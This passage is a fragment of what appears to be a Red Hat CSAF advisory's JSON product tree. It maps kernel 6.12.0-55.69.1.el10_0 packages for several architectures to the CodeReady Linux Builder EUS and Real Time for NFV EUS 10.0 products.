"name": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.src as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.src",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
